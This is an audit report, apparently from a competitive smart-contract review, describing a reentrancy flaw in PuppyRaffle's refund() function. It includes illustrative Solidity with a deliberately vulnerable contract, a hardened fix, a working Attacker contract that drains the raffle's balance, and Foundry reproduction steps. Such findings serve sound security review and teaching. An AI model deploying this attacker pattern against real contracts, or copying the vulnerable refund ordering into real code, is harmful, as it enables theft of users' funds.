Beginner Friendly, Foundry, NFT
100 EXP
Submission Details
Severity: high
Valid

refund() function is vulnerable to re-entrancy attack

Summary

The refund() function in PuppyRaffle.sol is vulnerable to reentrancy through its call to OpenZeppelin's Address.sendValue(), which hands control to the recipient before the player's state is updated.

Vulnerability Details

The refund() function in PuppyRaffle.sol uses OpenZeppelin's Address.sol sendValue() to refund the calling player. The documentation of that function carries the following warning:

* IMPORTANT: because control is transferred to `recipient`, care must be
* taken to not create reentrancy vulnerabilities. Consider using
* {ReentrancyGuard} or the
* https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].

refund() implements neither of those techniques. Because sendValue() forwards control (and all remaining gas) to the recipient before refund() has recorded that the player was refunded, a recipient contract can call refund() again from its receive()/fallback function, pass the same checks, and be paid again.

Impact

A malicious player (a contract that re-enters refund() from its receive() function) can repeat the refund until the contract can no longer pay an entrance fee, draining the balance that belongs to the other players.

Tools Used

Manual review

Recommendations

Follow the checks-effects-interactions pattern (update the player's state before calling sendValue()) or inherit OpenZeppelin's ReentrancyGuard and mark refund() as nonReentrant.
As defence in depth, also check that the contract balance covers the refund before sending it. Note that this balance check alone does not prevent reentrancy: each re-entrant call still sees a sufficient balance until the contract is drained.
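The vulnerable pattern from the Vulnerability Details section beside the checks-effects-interactions fix recommended above, with an attacker contract that exercises both. This is an added example written for this report, not PuppyRaffle's own code: the simplified RaffleBase/VulnerableRaffle/HardenedRaffle/Attacker contracts, the players array, the playerCount() helper, and the OpenZeppelin import path are assumptions for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example modelled on the refund pattern this finding describes.
// NOT PuppyRaffle's own code: contract names, storage layout, playerCount()
// and the Attacker contract are assumptions made for illustration.
import {Address} from "@openzeppelin/contracts/utils/Address.sol";

abstract contract RaffleBase {
    uint256 public immutable entranceFee;
    address[] public players;

    constructor(uint256 _entranceFee) {
        entranceFee = _entranceFee;
    }

    function enterRaffle() external payable {
        require(msg.value == entranceFee, "Raffle: wrong entrance fee");
        players.push(msg.sender);
    }

    function playerCount() external view returns (uint256) {
        return players.length;
    }

    function refund(uint256 playerIndex) external virtual;
}

// VULNERABLE: the interaction (sendValue) happens before the effect (clearing
// the player's slot). sendValue forwards all remaining gas, so a contract
// recipient can call refund() again from receive() while the slot still holds
// its address and both require checks still pass.
contract VulnerableRaffle is RaffleBase {
    using Address for address payable;

    constructor(uint256 _entranceFee) RaffleBase(_entranceFee) {}

    function refund(uint256 playerIndex) external override {
        address player = players[playerIndex];
        require(player == msg.sender, "Raffle: only the player can refund");
        require(player != address(0), "Raffle: player already refunded");
        payable(msg.sender).sendValue(entranceFee); // control leaves the contract here
        players[playerIndex] = address(0);          // effect applied too late
    }
}

// HARDENED: checks-effects-interactions. The slot is cleared before the
// external call, so a re-entrant refund() fails the "already refunded" check;
// that makes sendValue revert and unwinds the whole attack. Alternatively,
// inherit OpenZeppelin's ReentrancyGuard and mark refund() nonReentrant.
contract HardenedRaffle is RaffleBase {
    using Address for address payable;

    constructor(uint256 _entranceFee) RaffleBase(_entranceFee) {}

    function refund(uint256 playerIndex) external override {
        address player = players[playerIndex];
        require(player == msg.sender, "Raffle: only the player can refund");
        require(player != address(0), "Raffle: player already refunded");
        players[playerIndex] = address(0);          // effect first
        payable(msg.sender).sendValue(entranceFee); // interaction last
    }
}

// Attacker: enters once, requests a refund, and re-enters refund() from
// receive() for as long as the raffle can still pay out one entrance fee.
contract Attacker {
    RaffleBase public immutable raffle;
    uint256 private index;

    constructor(RaffleBase _raffle) {
        raffle = _raffle;
    }

    function attack() external payable {
        raffle.enterRaffle{value: msg.value}();
        index = raffle.playerCount() - 1;
        raffle.refund(index);
    }

    receive() external payable {
        // Stop before the raffle cannot pay: a failed sendValue would revert
        // the entire chain of calls, including the refunds already received.
        if (address(raffle).balance >= raffle.entranceFee()) {
            raffle.refund(index);
        }
    }
}
```

To reproduce in a Foundry test: deploy VulnerableRaffle with a 1 ether fee, have several test addresses call enterRaffle(), deploy Attacker against it and call attack{value: 1 ether}(); the raffle's balance ends at zero and the attacker holds every fee. Run the same test against HardenedRaffle and the call to attack() reverts with the "already refunded" message from the nested refund(), leaving all balances unchanged.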

Updates

Lead Judging Commences

Hamiltonite Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

reentrancy-in-refund

reentrancy in refund() function
